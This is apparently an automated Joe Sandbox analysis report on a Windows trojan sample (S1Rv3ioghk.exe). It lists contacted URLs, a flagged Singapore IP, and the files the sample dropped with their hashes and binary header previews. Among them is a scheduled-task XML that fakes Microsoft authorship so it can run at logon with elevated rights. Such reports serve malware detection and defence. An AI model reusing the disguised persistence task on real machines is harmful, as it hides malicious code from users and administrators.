                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000010.00000002.2528737566.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2528737566.0000000004935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.2543413413.0000000005842000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crl.microf?powershell.exe, 00000011.00000002.2549179185.0000000006FAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://ic.wps.cn/wpsv6internet/infos.ads?v=D1S1E1&d=kdcsdk_infoc/wps/client/appcountrycodelastupdateS1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000010.00000002.2528737566.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://en.ksupdate.com/errorreport/uphttps://en.ksupdate.com/errorreport/up-crashdmpS1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                                                                		high
                                                                https://www.wps.com/eulaprivacy_policylicense_agreementlabelTitleMsg_Wps_OnlineSetup_TaskMsgMsg_Wps_S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                                                                  		high
                                                                  https://params.wps.com/api/map/online_params/webparam_mig/onlineParamByFunc?funcName=S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                                                                    		high
                                                                    https://website-prod.cache.wpscdn.com/pkgs/win/setup_XA_mui_Free.exeSOFTWARES1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      118.107.44.112
                                                                      		unknownSingapore
                                                                      		64050BCPL-SGBGPNETGlobalASNSGtrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1581258
                                                                      Start date and time:2024-12-27 09:18:34 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 16s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Run name:Run with higher sleep bypass
                                                                      Number of analysed new started processes analysed:28
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:S1Rv3ioghk.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:FD7EC2C34E2593E4D606E0A9D37E257A.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@43/28@0/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 25%
                                                                      HCA Information:
                                                                      • Successful, ratio: 97%
                                                                      • Number of executed functions: 117
                                                                      • Number of non-executed functions: 230
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target S1Rv3ioghk.exe, PID 6364 because there are no executed function
                                                                      • Execution Graph export aborted for target powershell.exe, PID 6104 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 6692 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      No context

                                                                      Domains

                                                                      No context

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      BCPL-SGBGPNETGlobalASNSGWiezmDFd6L.exeGet hashmaliciousUnknownBrowse
                                                                      • 134.122.155.90
                                                                      armv7l.elfGet hashmaliciousUnknownBrowse
                                                                      • 134.122.132.194
                                                                      492c3445eddadc4b2c411a6eb79813339a0b3fc6d2d69.dllGet hashmaliciousUnknownBrowse
                                                                      • 134.122.134.93
                                                                      rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                      • 202.95.11.110
                                                                      3.elfGet hashmaliciousUnknownBrowse
                                                                      • 137.220.247.57
                                                                      MicrosoftEdgeUpdateSetup.exeGet hashmaliciousUnknownBrowse
                                                                      • 134.122.134.93
                                                                      SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                      • 134.122.191.187
                                                                      http://93287.mobiGet hashmaliciousUnknownBrowse
                                                                      • 137.220.229.108
                                                                      T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                                      • 118.107.29.172
                                                                      oiBxz37xUo.dllGet hashmaliciousUnknownBrowse
                                                                      • 118.107.29.172

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      C:\Users\Public\Bulete\program\ShellExperienceHosts.exeTEKujpTgCK.exeGet hashmaliciousUnknownBrowse
                                                                        TEKujpTgCK.exeGet hashmaliciousUnknownBrowse

                                                                          Created / dropped Files

                                                                          C:\Users\Public\Bulete\program\IOVAS

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\S1Rv3ioghk.exe
                                                                          File Type:openssl enc'd data with salted password, base64 encoded
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):5.234069531114784
                                                                          Encrypted:false
                                                                          SSDEEP:3:iqkHHQwRS2k0OGad+FLin:ilnQwRSDnWLi
                                                                          MD5:E2FA2D0BD626C372F9EFA15C317F46B1
                                                                          SHA1:1CAA48FE6CA1483AE9A725E76D0D818051A72371
                                                                          SHA-256:39C5EC16491E480806D170BD2A8BC2C37623E55412088ED11F21DE7D9146CA73
                                                                          SHA-512:115A02EE1C1EF7A8CF2854969343813928C187DF0BB9CD1DE832236EDCBE675749C9B17C0F15E545712857FEE7B637473858076F071C94888687C381570572F1
                                                                          Malicious:false
                                                                          Preview:U2FsdGVkX19SSgxWGselBWOCnDAwAjUSAJ8Fo8HIt6cUaOMqZptM4GJaCI/aSrXz

                                                                          C:\Users\Public\Bulete\program\ShellExperienceHosts.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\S1Rv3ioghk.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):649416
                                                                          Entropy (8bit):6.182028963232553
                                                                          Encrypted:false
                                                                          SSDEEP:12288:zohLz8nnnnntnnnnnnnnnnnnnnnxnMvnnnnPZnnnnPxnnnnnnnnqshJSLnk41mCL:zshQmC5Bz5CLgBFqGI1yi/UQeZndsqro
                                                                          MD5:0922B22053A6D5D9516EA910D34A4771
                                                                          SHA1:784D3ED35D040091AE209792E2FA8FC97EE6A071
                                                                          SHA-256:41F413DEBFE785B95D852A396AEFE1C814F3C13BDEDF85526F2DC4E83127D6CA
                                                                          SHA-512:909EC8B2C1045CC11C03C6B82B7ED6AD96BC8E93F9C98CB8A668572C84CBBCE778C12365B2B2EB547218783A830BE41458E0AE21939E99339F54921D98D944D8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: TEKujpTgCK.exe, Detection: malicious, Browse
                                                                          • Filename: TEKujpTgCK.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.....U..U..U]..T..U]..T..U]..T..U]..T..U...T#.U...T..U...T..U...T..U..UW.U...T..U...T..U..[U..U...T..URich..U........................PE..L......d..........".......... ....../.............@.......................... ..................................................(....@...................\..............T........................... ...@............................................tp6............b.................. ..`.tp6.a..nZ.......\...f..............@..@.tp6......... ......................@..@.tp6.........@......................@..@.tp6d...5%.......&...f.............. ...................................................................................................................................................................................................................................................................................

                                                                          C:\Users\Public\Bulete\program\yyzyBase.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\S1Rv3ioghk.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3900728
                                                                          Entropy (8bit):6.921777359365007
                                                                          Encrypted:false
                                                                          SSDEEP:98304:j9G9uqf+tQ+5ObxeayQwz10kfVtOpDLYAznM71B99gnImkJ:j9qfyixeVtqktjAznM7X9+ImkJ
                                                                          MD5:E6B35BB2692E704C72FAD83DE5C86E67
                                                                          SHA1:B8335960E3A92ED8C436B46FCF9D1518902D8A1B
                                                                          SHA-256:48756A865554BFBBEAF25A0DDB3B16AF44F113327BA5C01A506E37F3F584D64D
                                                                          SHA-512:B7B1F0528AE5DEE82C4A057A9D99F716AB24A05A2D832CD15BE3CFC738CA97FF0A31DEC3877A32F189C9554364F7B024AB27BED0B4B94DE6B9F4D7DD9FBF03D4
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...B.Qg...........!.....^...r...............................................`;.......;...@.........................H ".L.... ".......$..L............:.8.....8............................... ......M ............. -"..............................text...8\.......^.................. ..`.rdata...'...p...(...b..............@..@.data.........#..p....#.............@....00cfg.......`$.......#.............@..@.tls.........p$.......#.............@....rsrc....L....$..N....#.............@..@.reloc........8......L8.............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\Public\Bulete\wps_lid.lid-s8HDMqE8a6Xy.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\S1Rv3ioghk.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):5910912
                                                                          Entropy (8bit):6.969603243680094
                                                                          Encrypted:false
                                                                          SSDEEP:98304:O6pg+4qaSDRumxkEpMH1FkQmOnhTjqsaUODS4IeOsyrwuv/guB/k:V5IS1FnpAvHZwiO2AOsezgyk
                                                                          MD5:5C8ABA9389C18C86BDD8014A0236D165
                                                                          SHA1:C01D208B37F913BF0D49306A715234C8C26CCB95
                                                                          SHA-256:5BDEB32D9035F87180E12AF1FB48E8DC1D921125265840A43DA067EDA31645EF
                                                                          SHA-512:217881B7DF89865139D9A74584EA1B28AA952C478D5CFDA20D5744C34579EFD2C2DEB4E534AFE32EAAAC9B998D956D5B7B8CA72305F9FB78D03D7C46FCD515D0
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......#..Yg..g..g..<...~..<......<...f....q.j..5...t..5...}..<...f..5......<...x..<...d..g..r.........g..............s.f..g...e......f..Richg..........PE..L....(2g.................V>..........V'......p>...@...........................Z.......Z...@...................................K.(.....L..S............Y..Q....W.H....6I.8...................@6I.....h|F.@............p>.`.....J.@....................text....T>......V>................. ..`.rdata.......p>......Z>.............@..@.data...TR...0K.......K.............@....rsrc....S....L..T....K.............@..@.reloc..H.....W......HW.............@..B................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1360
                                                                          Entropy (8bit):5.4072854279441245
                                                                          Encrypted:false
                                                                          SSDEEP:24:3pWSKco4KmZjKbmOIKod6emN1s4RPQoU99tXt/NK3R88bJ02iaEW3b5:ZWSU4xympjms4RIoU99tlNWR832qab5
                                                                          MD5:6D0F607797C1AB216DCAB3AE8135D859
                                                                          SHA1:3ECA594EB3134F6570E9D2D8D09A7579B3C82356
                                                                          SHA-256:EC517F5926C441982D43745F566967E4C190D022028BE6C80B93E244293538BF
                                                                          SHA-512:5336F98D40BFA67ADCA7BB5568F0B5190A52427ADE377B0E0A525A5DF85F36F4D2CD330A5F02CE2238E90A8C695395EA31F702EB590E9C77E92156D83E7C7CC6
                                                                          Malicious:false
                                                                          Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                                          C:\Users\user\AppData\Local\PolicyManagement.xml

                                                                          Download File
                                                                          Process:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          File Type:XML 1.0 document, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1893
                                                                          Entropy (8bit):5.212287775015203
                                                                          Encrypted:false
                                                                          SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                          MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                          SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                          SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                          SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                          Malicious:false
                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bvz1vp5.yrb.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ga2qn35.dwe.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agszsb4v.jyx.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ch0nufvv.nlb.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krrwchtn.iho.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzif3cvm.qgi.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pj03nlyh.csy.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3qvxreq.au1.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\backup.dll

                                                                          Download File
                                                                          Process:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3900728
                                                                          Entropy (8bit):6.921777359365007
                                                                          Encrypted:false
                                                                          SSDEEP:98304:j9G9uqf+tQ+5ObxeayQwz10kfVtOpDLYAznM71B99gnImkJ:j9qfyixeVtqktjAznM7X9+ImkJ
                                                                          MD5:E6B35BB2692E704C72FAD83DE5C86E67
                                                                          SHA1:B8335960E3A92ED8C436B46FCF9D1518902D8A1B
                                                                          SHA-256:48756A865554BFBBEAF25A0DDB3B16AF44F113327BA5C01A506E37F3F584D64D
                                                                          SHA-512:B7B1F0528AE5DEE82C4A057A9D99F716AB24A05A2D832CD15BE3CFC738CA97FF0A31DEC3877A32F189C9554364F7B024AB27BED0B4B94DE6B9F4D7DD9FBF03D4
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...B.Qg...........!.....^...r...............................................`;.......;...@.........................H ".L.... ".......$..L............:.8.....8............................... ......M ............. -"..............................text...8\.......^.................. ..`.rdata...'...p...(...b..............@..@.data.........#..p....#.............@....00cfg.......`$.......#.............@..@.tls.........p$.......#.............@....rsrc....L....$..N....#.............@..@.reloc........8......L8.............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\backup.exe

                                                                          Download File
                                                                          Process:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):649416
                                                                          Entropy (8bit):6.182028963232553
                                                                          Encrypted:false
                                                                          SSDEEP:12288:zohLz8nnnnntnnnnnnnnnnnnnnnxnMvnnnnPZnnnnPxnnnnnnnnqshJSLnk41mCL:zshQmC5Bz5CLgBFqGI1yi/UQeZndsqro
                                                                          MD5:0922B22053A6D5D9516EA910D34A4771
                                                                          SHA1:784D3ED35D040091AE209792E2FA8FC97EE6A071
                                                                          SHA-256:41F413DEBFE785B95D852A396AEFE1C814F3C13BDEDF85526F2DC4E83127D6CA
                                                                          SHA-512:909EC8B2C1045CC11C03C6B82B7ED6AD96BC8E93F9C98CB8A668572C84CBBCE778C12365B2B2EB547218783A830BE41458E0AE21939E99339F54921D98D944D8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.....U..U..U]..T..U]..T..U]..T..U]..T..U...T#.U...T..U...T..U...T..U..UW.U...T..U...T..U..[U..U...T..URich..U........................PE..L......d..........".......... ....../.............@.......................... ..................................................(....@...................\..............T........................... ...@............................................tp6............b.................. ..`.tp6.a..nZ.......\...f..............@..@.tp6......... ......................@..@.tp6.........@......................@..@.tp6d...5%.......&...f.............. ...................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\monitor.bat

                                                                          Download File
                                                                          Process:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):799
                                                                          Entropy (8bit):5.133222805965959
                                                                          Encrypted:false
                                                                          SSDEEP:24:NFW/WilW/WvlWE3fzWcmrfZKx31SIYaYZLZ6y:NFVIVNjvzCZKx31SIYN/6y
                                                                          MD5:3B361EC9F7132332DD5FC2031ACA6305
                                                                          SHA1:3A2672F4FA8194B46BC20DA16E085DC9F26785A6
                                                                          SHA-256:740F6CE9EF39BB4728FE1C8CF21DBABACE5A79395BDF6EFEE4F56866B1318056
                                                                          SHA-512:3028C1D056A0806E3CDCBB2D2B5A737FD4C4872A1C401FB32098892F766E37EBB840E0575E4543F2F68C74FBCA8632AB74BCA229D6E4BD2F1843B666D211EE5E
                                                                          Malicious:false
